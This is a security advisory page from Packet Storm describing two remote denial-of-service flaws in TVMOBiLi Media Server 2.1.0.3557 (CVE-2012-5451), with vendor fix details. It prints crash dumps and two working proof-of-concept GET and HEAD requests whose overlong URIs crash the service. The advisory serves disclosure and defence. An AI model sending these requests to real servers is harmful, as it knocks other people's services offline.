exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

TVMOBiLi Media Server 2.1.0.3557 Denial Of Service
Posted Dec 7, 2012
Authored by High-Tech Bridge SA | Site htbridge.com

TVMOBiLi Media Server version 2.1.0.3557 suffers from a denial of service vulnerability via a malicious HTTP request.

tags | exploit, web, denial of service
advisories | CVE-2012-5451
SHA-256 | f68ed358ff971c45c2da99b5db07094b1511f78748ffef0b3a466ebd292bffac

TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

Change Mirror Download
Advisory ID: HTB23120
Product: TVMOBiLi media server
Vendor: TVMOBiLi
Vulnerable Version(s): 2.1.0.3557 and probably prior version
Tested Version: 2.1.0.3557 in Windows XP SP3 32 bits
Vendor Notification: October 15, 2012
Vendor Patch: November 21, 2012
Public Disclosure: December 5, 2012
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130]
CVE Reference: CVE-2012-5451
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Solution Status: Fixed by Vendor
Risk Level: Medium
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests.

1) Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451

1.1 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to 30888/TCP port (default TVMOBiLi's server port) and cause a stack-based buffer overrun that will crash tvMobiliService service.

Crash details


MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000
CONTEXT DUMP
EIP: 78abe2ad mov [edx],al
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
EBX: 00000019 ( 25) -> N/A
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)
EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack)
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)
+00: 78abe2ff (2024530687) -> N/A
+04: 00000000 ( 0) -> N/A
+08: 0000011f ( 287) -> N/A
+0c: 00000002 ( 2) -> N/A
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A

disasm around:
0x78abe28e jnc 0x78abe2f9
0x78abe290 outsb
0x78abe292 and fs:[eax],al
0x78abe296 test byte [ecx+0xc],0x40



Proof of Concept
The following HTTP GET request will crash vulnerable tvMobiliService service remotely:


GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None



1.2 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of 255, 257 or 260 characters long to 30888/TCP port and cause a stack-based buffer overrun that will crash tvMobiliService service.

Crash details

MSVCR100.dll:78abe2ad mov [edx], al from thread 1745 caused access violation when attempting to write to 0x0170e000

CONTEXT DUMP
EIP: 78abe2ad mov [edx],al
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
EBX: 00000019 ( 25) -> N/A
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)
EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack)
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)
+00: 78abe2ff (2024530687) -> N/A
+04: 00000000 ( 0) -> N/A
+08: 0000011f ( 287) -> N/A
+0c: 00000002 ( 2) -> N/A
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A

disasm around:
0x78abe28e jnc 0x78abe2f9
0x78abe290 outsb
0x78abe292 and fs:[eax],al
0x78abe296 test byte [ecx+0xc],0x40



Proof of Concept
The following HTTP HEAD request will crash vulnerable tvMobiliService service remotely:


HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None




-----------------------------------------------------------------------------------------------

Solution:

Upgrade to TVMOBiLi 2.1.0.3974

More Information:
http://forum.tvmobili.com/viewtopic.php?f=7&t=55117
http://dev.tvmobili.com/changelog.php

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23120 - https://www.htbridge.com/advisory/HTB23120 - TvMobili Media Server Multiple Remote DoS Vulnerabilities.
[2] TVMOBiLi LTD - http://www.tvmobili.com - TVMOBiLi is a free Media server for Mac, Windows, and Linux Operating Systems.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close